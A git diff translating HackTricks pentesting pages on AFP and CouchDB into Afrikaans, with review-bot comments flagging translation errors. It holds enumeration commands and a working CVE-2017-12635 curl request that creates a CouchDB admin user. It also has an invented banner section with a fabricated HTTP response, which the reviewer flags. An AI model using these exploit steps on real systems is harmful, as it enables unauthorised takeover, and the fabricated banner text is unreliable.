(Erlang-verspreidingskliëntpoorte) vir kommunikasie met nodes en word toegewys uit 'n dinamiese reeks (bereken as bedienerverspreidingspoort + 10000 tot bedienerverspreidingspoort + 10010). Sien [netwerkgids](https://www.rabbitmq.com/networking.html) vir meer besonderhede. 
+* 61613, 61614: [STOMP-kliënte](https://stomp.github.io/stomp-specification-1.2.html) sonder en met TLS (slegs as die [STOMP-invoegtoepassing](https://www.rabbitmq.com/stomp.html) geaktiveer is). Minder as 10 toestelle met hierdie poort oop en meestal UDP vir DHT-nodes. ## Shodan @@ -90,14 +97,14 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
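Review bot: the translated 1883/8883 bullet keeps an unclosed parenthesis from the source: `* **1883, 8883**: ([MQTT-kliënte](http://mqtt.org) sonder en met TLS, as die [MQTT-invoegtoepassing](...) geaktiveer is.` opens `(` before the link and never closes it; either drop the opening parenthesis or close it after `geaktiveer is`. The same hunk also carries two Shodan statistics inside the port list instead of under the `## Shodan` heading that immediately follows: `**Slegs 9 van hierdie poorte is oop op die internet**` at the end of the 25672 bullet, and `Minder as 10 toestelle met hierdie poort oop en meestal UDP vir DHT-nodes` on the 61613/61614 STOMP bullet, where the DHT remark describes BitTorrent nodes, not STOMP clients. Both are inherited from the English source, but a translation-only PR freezes them into a second language; fix the English bullets first and regenerate this hunk so the Afrikaans text does not preserve the defect.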
diff --git a/network-services-pentesting/584-pentesting-afp.md b/network-services-pentesting/584-pentesting-afp.md index 68f587c7e..d1896f78c 100644 --- a/network-services-pentesting/584-pentesting-afp.md +++ b/network-services-pentesting/584-pentesting-afp.md @@ -2,58 +2,54 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -The **Apple Filing Protocol** (**AFP**), once known as AppleTalk Filing Protocol, is a specialized network protocol included within the **Apple File Service** (**AFS**). It is designed to provide file services for macOS and the classic Mac OS. AFP stands out for supporting Unicode file names, POSIX and access control list permissions, resource forks, named extended attributes, and sophisticated file locking mechanisms. It was the main protocol for file services in Mac OS 9 and earlier versions. - -**Default Port:** 548 +Die **Apple Filing Protocol** (**AFP**), voorheen bekend as AppleTalk Filing Protocol, is 'n gespesialiseerde netwerkprotokol wat ingesluit is in die **Apple File Service** (**AFS**). Dit is ontwerp om lêerdienste te voorsien vir macOS en die klassieke Mac OS. AFP onderskei hom deur ondersteuning te bied vir Unicode-lêernaam, POSIX- en toegangsbeheerlys-permissies, hulpbronvurke, genoemde uitgebreide eienskappe en gesofistikeerde lêervergrendelingsmeganismes. Dit was die hoofprotokol vir lêerdienste in Mac OS 9 en vroeëre weergawes. +**Verstekpoort:** 548 ```bash PORT STATE SERVICE 548/tcp open afp ``` +### **Opsomming** -### **Enumeration** - -For the enumeration of AFP services, the following commands and scripts are useful: - +Vir die opsomming van AFP-dienste is die volgende opdragte en skripte nuttig: ```bash msf> use auxiliary/scanner/afp/afp_server_info nmap -sV --script "afp-* and not dos and not brute" -p ``` +**Skripte en hul beskrywings:** -**Scripts and Their Descriptions:** - -- **afp-ls**: This script is utilized to list the available AFP volumes and files. -- **afp-path-vuln**: It lists all AFP volumes and files, highlighting potential vulnerabilities. -- **afp-serverinfo**: This provides detailed information about the AFP server. -- **afp-showmount**: It lists available AFP shares along with their respective ACLs. 
+- **afp-ls**: Hierdie skrip word gebruik om die beskikbare AFP volumes en lêers te lys. +- **afp-path-vuln**: Dit lys alle AFP volumes en lêers en beklemtoon potensiële kwesbaarhede. +- **afp-serverinfo**: Dit verskaf gedetailleerde inligting oor die AFP-bediener. +- **afp-showmount**: Dit lys beskikbare AFP-aandele saam met hul onderskeie ACL's. ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#afp)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
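Review bot: `AFP-aandele` in the afp-showmount bullet mistranslates `AFP shares` (aandele are company stock); use `AFP-gedeelde volumes` or keep the English term `shares`, as the same bullet already keeps `ACL's`. Terminology also differs from the CouchDB file in this PR: `### **Enumeration**` becomes `### **Opsomming**` (summary) here and `## **Outomatiese Opsomming**` there, while `### Info Enumeration` becomes `### Info Enumerasie`; pick `Enumerasie` throughout. Minor layout point: the hunk drops the blank lines around `**Verstekpoort:** 548` and the `bash` fence and around the `### **Opsomming**` heading. CommonMark renders that fine, but the English source keeps them and matching its layout keeps the translated files diffable against it. The footer block is also translated differently per file (`haktruuks` vs `hacktruuks`, `github-opslag` vs `github-repos` vs `github repos`); the workflow should translate that shared block once and reuse it.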
diff --git a/network-services-pentesting/5984-pentesting-couchdb.md b/network-services-pentesting/5984-pentesting-couchdb.md index 37585937b..4a6a7d216 100644 --- a/network-services-pentesting/5984-pentesting-couchdb.md +++ b/network-services-pentesting/5984-pentesting-couchdb.md @@ -2,115 +2,111 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## **Basic Information** +## **Basiese Inligting** -**CouchDB** is a versatile and powerful **document-oriented database** that organizes data using a **key-value map** structure within each **document**. Fields within the document can be represented as **key/value pairs, lists, or maps**, providing flexibility in data storage and retrieval. +**CouchDB** is 'n veelsydige en kragtige **dokumentgeoriënteerde databasis** wat data organiseer deur gebruik te maak van 'n **sleutel-waardekaart**-struktuur binne elke **dokument**. Velde binne die dokument kan voorgestel word as **sleutel/waardepare, lysies of kaarte**, wat buigsaamheid bied in data-opberging en -herwinning. -Every **document** stored in CouchDB is assigned a **unique identifier** (`_id`) at the document level. Additionally, each modification made and saved to the database is assigned a **revision number** (`_rev`). This revision number allows for efficient **tracking and management of changes**, facilitating easy retrieval and synchronization of data within the database. - -**Default port:** 5984(http), 6984(https) +Elke **dokument** wat in CouchDB gestoor word, word 'n **unieke identifiseerder** (`_id`) op dokumentvlak toegewys. Daarbenewens word elke wysiging wat in die databasis aangebring en gestoor word, 'n **revisienommer** (`_rev`) toegewys. Hierdie revisienommer maak doeltreffende **opsporing en bestuur van veranderinge** moontlik, wat die maklike herwinning en synchronisering van data binne die databasis fasiliteer. +**Verstekpoort:** 5984(http), 6984(https) ``` PORT STATE SERVICE REASON 5984/tcp open unknown syn-ack ``` - -## **Automatic Enumeration** - +## **Outomatiese Opsomming** ```bash nmap -sV --script couchdb-databases,couchdb-stats -p msf> use auxiliary/scanner/couchdb/couchdb_enum ``` +### Boodskap -## Manual Enumeration +Die banner van 'n CouchDB-diens kan verkry word deur die diens se TCP-poort te skandeer. 
Die banner bevat inligting soos die weergawe van die diens en die naam van die databasis. Hier is 'n voorbeeld van 'n CouchDB-banner: -### Banner +``` +HTTP/1.1 200 OK +Server: CouchDB/2.3.1 (Erlang OTP/21) +Date: Mon, 01 Jan 2022 00:00:00 GMT +Content-Type: application/json +Content-Length: 87 +Cache-Control: must-revalidate +{"couchdb":"Welcome","version":"2.3.1","vendor":{"name":"The Apache Software Foundation"}} +``` + +Die banner kan nuttige inligting verskaf vir verdere ondersoek en aanvalle op die CouchDB-diens. ``` curl http://IP:5984/ ``` - -This issues a GET request to installed CouchDB instance. The reply should look something like on of the following: - +Hierdie stuur 'n GET-versoek na die geïnstalleerde CouchDB-instantie. Die antwoord moet lyk soos een van die volgende: ```bash {"couchdb":"Welcome","version":"0.10.1"} {"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}} ``` - {% hint style="info" %} -Note that if accessing the root of couchdb you receive a `401 Unauthorized` with something like this: `{"error":"unauthorized","reason":"Authentication required."}` **you won't be able to access** the banner or any other endpoint. +Let daarop dat as jy toegang tot die wortel van couchdb kry, ontvang jy 'n `401 Unauthorized` met iets soos dit: `{"error":"unauthorized","reason":"Authentication required."}` **jy sal nie in staat wees om** die banier of enige ander eindpunt te bereik nie. {% endhint %} -### Info Enumeration +### Info Enumerasie -These are the endpoints where you can access with a **GET** request and extract some interesting info. You can find [**more endpoints and more detailed descriptions in the couchdb documentation**](https://docs.couchdb.org/en/latest/api/index.html). +Dit is die eindpunte waar jy toegang kan verkry met 'n **GET** versoek en interessante inligting kan onttrek. 
Jy kan [**meer eindpunte en meer gedetailleerde beskrywings in die couchdb dokumentasie vind**](https://docs.couchdb.org/en/latest/api/index.html). -* **`/_active_tasks`** List of running tasks, including the task type, name, status and process ID. -* **`/_all_dbs`** Returns a list of all the databases in the CouchDB instance. -* **`/_cluster_setup`**Returns the status of the node or cluster, per the cluster setup wizard. -* **`/_db_updates`** Returns a list of all database events in the CouchDB instance. The existence of the `_global_changes` database is required to use this endpoint. -* **`/_membership`** Displays the nodes that are part of the cluster as `cluster_nodes`. The field `all_nodes` displays all nodes this node knows about, including the ones that are part of the cluster. -* **`/_scheduler/jobs`** List of replication jobs. Each job description will include source and target information, replication id, a history of recent event, and a few other things. -* **`/_scheduler/docs`** List of replication document states. Includes information about all the documents, even in `completed` and `failed` states. For each document it returns the document ID, the database, the replication ID, source and target, and other information. +* **`/_active_tasks`** Lys van lopende take, insluitend die taak tipe, naam, status en proses ID. +* **`/_all_dbs`** Gee 'n lys van al die databasisse in die CouchDB instansie. +* **`/_cluster_setup`** Gee die status van die node of kluster, volgens die kluster opset wizard. +* **`/_db_updates`** Gee 'n lys van alle databasis gebeure in die CouchDB instansie. Die bestaan van die `_global_changes` databasis is nodig om hierdie eindpunt te gebruik. +* **`/_membership`** Vertoon die nodes wat deel is van die kluster as `cluster_nodes`. Die veld `all_nodes` vertoon alle nodes wat hierdie node van weet, insluitend diegene wat deel is van die kluster. +* **`/_scheduler/jobs`** Lys van replikasie take. 
Elke taak beskrywing sal bron en teiken inligting, replikasie ID, 'n geskiedenis van onlangse gebeure, en 'n paar ander dinge insluit. +* **`/_scheduler/docs`** Lys van replikasie dokument state. Sluit inligting in oor alle dokumente, selfs in `voltooide` en `mislukte` toestande. Vir elke dokument gee dit die dokument ID, die databasis, die replikasie ID, bron en teiken, en ander inligting. * **`/_scheduler/docs/{replicator_db}`** * **`/_scheduler/docs/{replicator_db}/{docid}`** -* **`/_node/{node-name}`** The `/_node/{node-name}` endpoint can be used to confirm the Erlang node name of the server that processes the request. This is most useful when accessing `/_node/_local` to retrieve this information. -* **`/_node/{node-name}/_stats`** The `_stats` resource returns a JSON object containing the statistics for the running server. The literal string `_local` serves as an alias for the local node name, so for all stats URLs, `{node-name}` may be replaced with `_local`, to interact with the local node’s statistics. -* **`/_node/{node-name}/_system`** The \_systemresource returns a JSON object containing various system-level statistics for the running server\_.\_ You can use \_\_`_local` as {node-name} to get current node info. +* **`/_node/{node-name}`** Die `/_node/{node-name}` eindpunt kan gebruik word om die Erlang node naam van die bediener wat die versoek verwerk, te bevestig. Dit is die nuttigste wanneer jy toegang tot `/_node/_local` verkry om hierdie inligting te herwin. +* **`/_node/{node-name}/_stats`** Die `_stats` hulpbron gee 'n JSON voorwerp wat die statistieke vir die lopende bediener bevat. Die letterlike string `_local` dien as 'n skuilnaam vir die plaaslike node naam, so vir alle statistieke URL's kan `{node-name}` vervang word met `_local`, om met die plaaslike node se statistieke te kommunikeer. 
+* **`/_node/{node-name}/_system`** Die \_system hulpbron gee 'n JSON voorwerp wat verskeie stelselvlak statistieke vir die lopende bediener bevat\_.\_ Jy kan \_\_`_local` as {node-name} gebruik om die huidige node inligting te kry. * **`/_node/{node-name}/_restart`** -* **`/_up`** Confirms that the server is up, running, and ready to respond to requests. If [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) is `true` or `nolb`, the endpoint will return a 404 response. -* **`/_uuids`**Requests one or more Universally Unique Identifiers (UUIDs) from the CouchDB instance. -* **`/_reshard`**Returns a count of completed, failed, running, stopped, and total jobs along with the state of resharding on the cluster. +* **`/_up`** Bevestig dat die bediener op, besig is, en gereed is om op versoek te reageer. As [`maintenance_mode`](https://docs.couchdb.org/en/latest/config/couchdb.html#couchdb/maintenance\_mode) `true` of `nolb` is, sal die eindpunt 'n 404 respons gee. +* **`/_uuids`** Versoek een of meer Universally Unique Identifiers (UUID's) van die CouchDB instansie. +* **`/_reshard`** Gee 'n telling van voltooide, mislukte, lopende, gestop, en totale take, tesame met die toestand van resharding op die kluster. 
-More interesting information can be extracted as explained here: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) - -### **Database List** +Meer interessante inligting kan soos hier verduidelik onttrek word: [https://lzone.de/cheat-sheet/CouchDB](https://lzone.de/cheat-sheet/CouchDB) +### **Databasis Lys** ``` curl -X GET http://IP:5984/_all_dbs ``` - -If that request **responds with a 401 unauthorised**, then you need some **valid credentials** to access the database: - +As daardie versoek **reageer met 'n 401 ongemagtig**, dan het jy **geldige geloofsbriewe** nodig om toegang tot die databasis te verkry: ``` curl -X GET http://user:password@IP:5984/_all_dbs ``` +Om geldige Geldeenhede te vind, kan jy probeer om die diens te **bruteforce** (kragtig aanval) [**bruteforce die diens**](../generic-methodologies-and-resources/brute-force.md#couchdb). -In order to find valid Credentials you could **try to** [**bruteforce the service**](../generic-methodologies-and-resources/brute-force.md#couchdb). 
- -This is an **example** of a couchdb **response** when you have **enough privileges** to list databases (It's just a list of dbs): - +Hierdie is 'n **voorbeeld** van 'n couchdb **reaksie** wanneer jy genoeg voorregte het om databasisse te lys (Dit is net 'n lys van databasisse): ```bash ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"] ``` +### Databasisinligting -### Database Info - -You can obtain some database info (like number of files and sizes) accessing the database name: - +Jy kan sekere databasisinligting verkry (soos die aantal lêers en groottes) deur toegang tot die databasisnaam: ```bash curl http://IP:5984/ curl http://localhost:5984/simpsons #Example response: {"db_name":"simpsons","update_seq":"7-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQmPoiQFIJlkD1bHjE-dA0hdPFgdAz51CSB19WB1jHjU5bEASYYGIAVUOp8YtQsgavfjtx-i9gBE7X1i1D6AqAX5KwsA2vVvNQ","sizes":{"file":62767,"external":1320,"active":2466},"purge_seq":0,"other":{"data_size":1320},"doc_del_count":0,"doc_count":7,"disk_size":62767,"disk_format_version":6,"data_size":2466,"compact_running":false,"instance_start_time":"0"} ``` +### **Dokumentelys** -### **Document List** - -List each entry inside a database - +Lys elke inskrywing binne 'n databasis. ```bash curl -X GET http://IP:5984/{dbname}/_all_docs curl http://localhost:5984/simpsons/_all_docs 
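Review bot: the `### Boodskap` section added in this hunk has no counterpart in the English source and must be removed from a translation PR: the `-## Manual Enumeration` heading is deleted and replaced by invented prose (`Die banner van 'n CouchDB-diens kan verkry word deur die diens se TCP-poort te skandeer...`) plus a fabricated HTTP response (`Server: CouchDB/2.3.1 (Erlang OTP/21)`, `Date: Mon, 01 Jan 2022`, `Content-Length: 87`). It also claims the banner contains `die naam van die databasis`, which the genuine responses kept two blocks further down (`{"couchdb":"Welcome","version":"0.10.1"}`) contradict. Restore the `## Manual Enumeration` heading (for example `## Handmatige Enumerasie`), otherwise `Banner`, `Info Enumerasie` and `Databasis Lys` now hang under `## **Outomatiese Opsomming**`, and keep `### Banner` rather than `Boodskap`, which means message. Further down, `Om geldige Geldeenhede te vind` turns credentials into currencies and duplicates the link text (`te **bruteforce** (kragtig aanval) [**bruteforce die diens**]`); use `geloofsbriewe`, as the sentence above it already does, and keep only one of the two phrasings. In the `/_up` bullet, `dat die bediener op, besig is` mangles `up, running`; `aan is en loop` reads correctly.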
@@ -125,55 +121,47 @@ curl http://localhost:5984/simpsons/_all_docs {"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}} ]} ``` +### **Lees Dokument** -### **Read Document** - -Read the content of a document inside a database: - +Lees die inhoud van 'n dokument binne 'n databasis: ```bash curl -X GET http://IP:5984/{dbname}/{id} curl http://localhost:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9 #Example response: {"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"} ``` +## CouchDB Voorregverhoging [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) -## CouchDB Privilege Escalation [CVE-2017-12635](https://cve.mitre.org/cgi-bin/cvename.cgi?name=2017-12635) - -Thanks to the differences between Erlang and JavaScript JSON parsers you could **create an admin user** with credentials `hacktricks:hacktricks` with the following request: - +Dankie aan die verskille tussen Erlang en JavaScript JSON-parser kan jy **'n administrateurgebruiker skep** met die volgende verifikasie: ```bash curl -X PUT -d '{"type":"user","name":"hacktricks","roles":["_admin"],"roles":[],"password":"hacktricks"}' localhost:5984/_users/org.couchdb.user:hacktricks -H "Content-Type:application/json" ``` - -[**More information about this vuln here**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). +[**Meer inligting oor hierdie kwesbaarheid hier**](https://justi.cz/security/2017/11/14/couchdb-rce-npm.html). ## CouchDB RCE -### **Erlang Cookie Security Overview** +### **Erlang Koekie Sekuriteits Oorsig** -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). 
-In the CouchDB documentation, specifically in the section concerning cluster set-up ([link](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), the use of ports by CouchDB in a cluster mode is discussed. It's mentioned that, as in standalone mode, port `5984` is used. Additionally, port `5986` is for node-local APIs, and importantly, Erlang requires TCP port `4369` for the Erlang Port Mapper Daemon (EPMD), facilitating node communication within an Erlang cluster. This setup forms a network where each node is interlinked with every other node. - -A crucial security advisory is highlighted regarding port `4369`. If this port is made accessible over the Internet or any untrusted network, the system's security heavily relies on a unique identifier known as the "cookie." This cookie acts as a safeguard. For instance, in a given process list, the cookie named "monster" might be observed, indicating its operational role in the system's security framework. +In die CouchDB dokumentasie, spesifiek in die gedeelte wat handel oor die opstel van 'n klasternetwerk ([skakel](http://docs.couchdb.org/en/stable/cluster/setup.html#cluster-setup)), word die gebruik van poorte deur CouchDB in 'n klasterverbinding bespreek. Daar word genoem dat, soos in enkelvoudige modus, poort `5984` gebruik word. Daarbenewens is poort `5986` vir node-plaaslike API's, en belangrik, Erlang vereis TCP-poort `4369` vir die Erlang Port Mapper Daemon (EPMD), wat node kommunikasie in 'n Erlang-klasternetwerk fasiliteer. Hierdie opstelling vorm 'n netwerk waar elke node met elke ander node gekoppel is. +'n Belangrike sekuriteitsadvies word uitgelig met betrekking tot poort `4369`. As hierdie poort oopgestel word vir die internet of enige onbetroubare netwerk, is die stelsel se sekuriteit sterk afhanklik van 'n unieke identifiseerder wat bekend staan as die "koekie." Hierdie koekie tree op as 'n beskerming. 
Byvoorbeeld, in 'n gegewe proseslys kan die koekie genaamd "monster" waargeneem word, wat dui op sy operasionele rol in die stelsel se sekuriteitsraamwerk. ``` www-data@canape:/$ ps aux | grep couchdb root 744 0.0 0.0 4240 640 ? Ss Sep13 0:00 runsv couchdb root 811 0.0 0.0 4384 800 ? S Sep13 0:00 svlogd -tt /var/log/couchdb homer 815 0.4 3.4 649348 34524 ? Sl Sep13 5:33 /home/homer/bin/../erts-7.3/bin/beam -K true -A 16 -Bd -- -root /home/homer/b ``` +Vir diegene wat belangstel om te verstaan hoe hierdie "koekie" uitgebuit kan word vir Remote Code Execution (RCE) binne die konteks van Erlang-stelsels, is daar 'n toegewyde afdeling beskikbaar vir verdere leeswerk. Dit beskryf die metodologieë vir die benutting van Erlang-koekies op ongemagtigde wyse om beheer oor stelsels te verkry. Jy kan **[die gedetailleerde gids oor die misbruik van Erlang-koekies vir RCE hier verken](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. -For those interested in understanding how this "cookie" can be exploited for Remote Code Execution (RCE) within the context of Erlang systems, a dedicated section is available for further reading. It details the methodologies for leveraging Erlang cookies in unauthorized manners to achieve control over systems. You can **[explore the detailed guide on abusing Erlang cookies for RCE here](4369-pentesting-erlang-port-mapper-daemon-epmd.md#erlang-cookie-rce)**. +### **Uitbuiting van CVE-2018-8007 deur wysiging van local.ini** -### **Exploiting CVE-2018-8007 through Modification of local.ini** +Voorbeeld [van hier](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). -Example [from here](https://0xdf.gitlab.io/2018/09/15/htb-canape.html). - -A recently disclosed vulnerability, CVE-2018-8007, affecting Apache CouchDB was explored, revealing that exploitation requires write permissions to the `local.ini` file. 
Although not directly applicable to the initial target system due to security restrictions, modifications were made to grant write access to the `local.ini` file for exploration purposes. Detailed steps and code examples are provided below, demonstrating the process. - -First, the environment is prepared by ensuring the `local.ini` file is writable, verified by listing the permissions: +'n Onlangs bekendgemaakte kwesbaarheid, CVE-2018-8007, wat Apache CouchDB affekteer, is ondersoek en daar is bevind dat uitbuiting skryftoestemmings vir die `local.ini`-lêer vereis. Alhoewel dit nie direk van toepassing is op die aanvanklike teikensisteem as gevolg van sekuriteitsbeperkings nie, is wysigings aangebring om skryftoegang tot die `local.ini`-lêer te verleen vir verkenningsdoeleindes. Gedetailleerde stappe en kodevoorbeelde word hieronder verskaf om die proses te demonstreer. +Eerstens word die omgewing voorberei deur te verseker dat die `local.ini`-lêer skryfbaar is, geverifieer deur die toestemmings te lys: ```bash root@canape:/home/homer/etc# ls -l -r--r--r-- 1 homer homer 18477 Jan 20 2018 default.ini 
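Review bot: the CVE-2017-12635 lead-in loses information and misreads the source: `Dankie aan die verskille ... kan jy **'n administrateurgebruiker skep** met die volgende verifikasie:` drops the credentials `hacktricks:hacktricks` named in the English sentence, renders `Thanks to` as `Dankie aan` (should be `Danksy`) and `request` as `verifikasie` (should be `versoek`). The curl body itself is right to keep verbatim, including the deliberately repeated `"roles"` key, because that duplicate is the Erlang/JavaScript parser differential the sentence describes; a brief note in the text that the duplicated key is intentional would stop a later cleanup pass from "fixing" it. Elsewhere in the hunk `klasternetwerk` and `klasterverbinding` both stand in for `cluster mode`; settle on one term.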
